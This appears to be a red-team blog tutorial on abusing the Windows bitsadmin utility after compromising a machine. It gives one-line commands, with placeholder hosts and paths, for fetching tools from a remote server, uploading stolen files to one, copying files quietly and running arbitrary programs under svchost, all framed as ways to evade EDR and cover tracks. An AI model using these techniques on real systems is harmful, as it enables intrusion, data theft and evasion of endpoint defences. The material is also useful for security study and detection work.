Well, I finally popped a box, but the EDR keeps sucking up all my tools. There must be a way to do some basic things on the box without getting caught. How can I poke around and do some stuff without possibly burning all my tools?
After all the hard work of getting onto a box, the endpoint security protection quarantines your hacking/malicious tools. This is a common plight of the average Script Kiddie. It is a constant battle between developers and security companies. Every time you make a new version of a tool, they write a signature for it, and *annoying sucking sound* there goes your hard work. If only there were a way to use the binaries and tools already on the system to accomplish what you want to do…
Welcome to the concept of Living Off the Land, an idea described at DerbyCon 3 by Christopher Campbell and Matt Graeber. When you are Living Off the Land, you use the executables and services already present on the system to accomplish your tasks. This most likely means using these binaries in ways other than what was intended, but it could mean using binaries that most people have forgotten about or never knew existed. If you can use some of the binaries that are on the system, then:
- You do not risk your tools
- You blend in by using the system’s tools
- You may avoid detection by using signed, whitelisted apps
There are many of these Living Off the Land binaries (LOLBins) and you can learn more about them over at https://lolbas-project.github.io/ or by watching Oddvar Moe’s presentation at DerbyCon 8.
As an introduction to this concept, we will look at bitsadmin, which is a command-line tool used to create, download, or upload BITS jobs and to monitor their progress. And what are BITS jobs? BITS jobs are tasks that utilize the Background Intelligent Transfer Service (BITS). BITS provides two (2) main types of jobs: upload and download. In addition to simply creating these jobs, it provides methods to monitor and manage them. And with a little knowledge, Script Kiddies, you will be able to take advantage of BITS to live off the land.
As mentioned, BITS is used to download files from or upload files to HTTP web servers or Server Message Block (SMB) file servers. In particular, it is used for Windows Updates, so it is most likely enabled and used. BITS takes a lot of the heavy lifting out of managing file transfers. It can pause and resume downloads (even across reboots). It is mindful of network congestion and can throttle its activity to maximize the user’s foreground experience. It can also take advantage of peer caching to increase transfer rates and reduce external network traffic.
Background Intelligent Transfer Service
OK. Before we get started, why don’t you give me the FAQ version of BITS. What are these BITS and why do I want to use them to build my byte?
The main purpose of BITS is to transfer files. Originally, it only allowed for file downloads, but uploading has been available since Windows XP SP2. As noted above, these file transfers use idle bandwidth to transfer data asynchronously in the background. This means that BITS will only transfer data whenever there is bandwidth that is not being used by other applications. The service also supports resuming transfers in case of disruptions, including reboot. It resumes the transfer from where it left off when the network connection is restored or the user logs back into the system.
BITS supports file transfers to an HTTP or REST web server or SMB file server. The server is typically an IIS web server with the BITS server extension enabled. If you are doing file uploads, you will need to make sure that permissions are set correctly on the upload directory. Other web servers may be used for downloads, but they must support HTTP/1.1 protocol and the HEAD and GET request methods. The HTTP server’s HEAD method must return the file size, and the GET request method must support the Content-Range and Content-Length headers.
BITS can be used by programmers and system administrators. System administrators typically use the bitsadmin command-line utility (deprecated) or PowerShell cmdlets for creating and managing transfers. BITS has a COM interface designed for C and C++ developers that can also be used in .NET projects.
The service itself relies on a queue of jobs. As mentioned, these jobs come in two (2) main types: download and upload. A user creates a job and then adds a file to the job. Download jobs support multiple files but uploads just support one (1) job. The individual files have their own properties including the source and destination at a minimum. The job also has properties that can be set before resuming the job.
A user has four (4) methods for manipulating the state of a job: Resume, Suspend, Cancel, and Complete. The Resume method is used to start a job that has been created or suspended, and the Complete method must be called once a transfer is done to actually finish the transfer. At this point, any fully downloaded files will be kept and any incomplete files or file transfers with errors will be deleted. You must either Complete or Cancel the job for it to move into the finished state and be removed from the queue.
Transferring a File
Great! Now that I got the lowdown, BITS seems like just the thing to transfer my files while staying hidden in the ‘background’. How nice of Windows to provide just the service I was looking for. So, how do I use this magic fetching fairy to actually download my other tools or upload all the goodies I find?
So, you want to transfer a file using BITS? Well, the first step to transferring a file is creating a job. Jobs can be created quite easily with the bitsadmin command-line utility using the /create switch. This switch allows us to create a download or upload job. In creating the job, we also provide a name that can be used for manipulating and displaying the jobs. After creating the job, we need to add a file to the job using the /addfile switch, which takes a source and destination. When downloading files, the source is our remote web server address. After creating the job and adding our file(s) to it, we need to resume the job that starts the transfer.
Finally, once the transfer is finished, we need to complete the job. Completing the job moves the transferred file from its temporary location to the destination specified and deletes any partially downloaded files. The following example can be used to download a file from a web server in one (1) line. It utilizes the timeout command-line utility to give the file transfer 10 seconds to complete.
>bitsadmin /create JOB & bitsadmin /addfile JOB <REMOTE_SRC> <LOCAL_DST> & bitsadmin /resume JOB & timeout /T 10 & bitsadmin /complete JOB
We can see the results of running this command in the following screen capture.
As noted, BITS can be used to upload files in addition to downloading files. The only difference in the commands is specifying that you are creating an upload job by including an additional switch in the bitsadmin /create command. Also note that the remote destination is first followed by the local source in the bitsadmin /addfile command. Again, the following example can be used to upload a file to a web server in one (1) line. It utilizes the timeout command-line utility to give the file transfer 10 seconds, but you could check the state manually using bitsadmin /getstate JOB, and then issuing the bitsadmin /complete JOB command once the file has transferred.
>bitsadmin /create /upload JOB & bitsadmin /addfile JOB <REMOTE_DST> <LOCAL_SRC> & bitsadmin /resume JOB & timeout /T 10 & bitsadmin /complete JOB
We can see the results of running this one-line upload command in the following screenshot.
Copying a File
So, BITS is great for transferring files, but that’s what it was designed for. What else can I do with this utility? I know you must have some tricks for abusing this binary to ‘live off the land.’
BITS was designed to transfer files, but the definition of ‘transfer’ is loose and can be stretched to include copying files. So, you can transfer files from a source on the same system to a destination on the same system. You create a BITS job just as you normally would, but instead of using a remote source, you simply supply a local source and a local destination using a full pathname. When you resume the job, BITS will ‘transfer,’ a.k.a. copy, the source to the destination. Note: this is a copy, not a move. This may not be all that useful, but it does somewhat cover your tracks on copying files by having the service do it for you instead of issuing the copy command directly. The following one-liner shows how to use the bitsadmin utility to copy a local file.
>bitsadmin /create JOB & bitsadmin /addfile JOB <LOCAL_SRC> <LOCAL_DST> & bitsadmin /resume JOB & bitsadmin /complete JOB
The following screenshot shows an example of using bitsadmin to copy a file.
Executing a File
Sure, copying files is neat, but come on. Get to the good stuff! There must be some other useful tips, otherwise you wouldn’t write a blog about it. So, what else can we make this thing do for us?
Transferring files may be handy, but that is what BITS was designed to do. And, copying files may be creative, but not all that sophisticated. It is simply expanding the definition of transferring. There is, however, a relatively unknown feature of BITS that will allow us to execute an arbitrary command. This will result in BITS issuing the command on our behalf. While it will still have our username attached to the process, it will be created as a child process of the service, which is run within the ‘svchost -k netsvcs’ service group. This helps provide some credence to our command and may help cover your tracks a little better than just running the command directly from your shell.
We can accomplish this feat by using the built-in ‘setnotifycmdline’ feature. This switch allows a user to set the command-line command that runs after the job finishes transferring data. This command is run before the job is actually completed, so it has not moved the file to the final destination and the job can still be cancelled. Also note that using this switch requires that the file transfer successfully before it calls the specified command line. Again, you can use our copy-file trick from above to trigger the event.
The ‘setnotifycmdline’ switch takes three (3) arguments: JOB, PROGRAM_NAME, and PARAMETERS. The PARAMETERS can be ‘NULL’, but if they are included, the first parameter must match the PROGRAM_NAME specified.
The following command line demonstrates using BITS and the ‘setnotifycmdline’ switch to execute a command.
>bitsadmin /create JOB & bitsadmin /addfile JOB <LOCAL_SRC> <LOCAL_DST> & bitsadmin /SetNotifyCmdLine JOB <PROGRAM_NAME> <PARAMETERS> & bitsadmin /resume JOB & bitsadmin /reset
The following screen capture shows an example of using this one-liner to execute calc.exe.
As you can see, the spawned calc.exe is a child process of the svchost.exe responsible for the netsvcs group of services.
So, BITS is extremely useful. I can’t believe Windows is just giving it away for free. Why haven’t I been using this my whole life? BITS—the gift that just keeps on giving. I can totally use this to ‘live off the land’ and stop worrying about those pesky EDRs hoovering my Script Kiddie tools.
This lesson for Script Kiddies covered BITS and how we can use it to ‘live off the land’. BITS is a built-in component of Windows that provides a method for downloading and uploading files. We can take advantage of this to upload and download our own files. We can also stretch the definition of downloading to copy files on the local system. Finally, we demonstrated how you can use a relatively unknown feature of this service to execute a command of your choice. Utilizing BITS or any other ‘LOLBIN’ allows you to possibly evade detection or, at a minimum, saves your tools from being detected and quarantined. You can take advantage of these obscure binaries or unknown features of well-known binaries to accomplish a lot of tasks. So, save yourself some frustrations and just ‘live off the land’ with BITS, and, as always, remember to check your return values.